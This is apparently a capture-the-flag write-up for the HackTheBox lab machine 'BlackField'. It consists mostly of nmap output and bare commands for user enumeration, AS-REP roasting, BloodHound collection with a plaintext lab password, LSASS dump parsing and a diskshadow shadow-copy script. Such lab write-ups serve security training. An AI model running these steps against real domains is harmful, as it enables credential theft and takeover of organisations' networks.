HackTheBox-BlackField

NMAP

PORT      STATE SERVICE       VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-01 02:43:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

PORT 139/445 (SMB)

Foothold

/opt/kerbrute/kerbrute_linux_amd64 userenum -d BLACKFIELD.local users.txt --dc 10.10.10.192
python3 /opt/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.192 -usersfile users.txt BLACKFIELD/abc
python3 /opt/Python-Bloodhound/bloodhound.py -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -c all -ns 10.10.10.192

Privilege Escalation (Audit2020)

Privilege Escalation (svc_backup)

/usr/local/bin/pypykatz lsa minidump lsass.DMP

Privilege Escalation (Administrator)

set context persistent nowriters
set metadata C:\temp\metdata.cab
set verbose on
add volume C: alias uwu
create
expose %uwu% f:

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store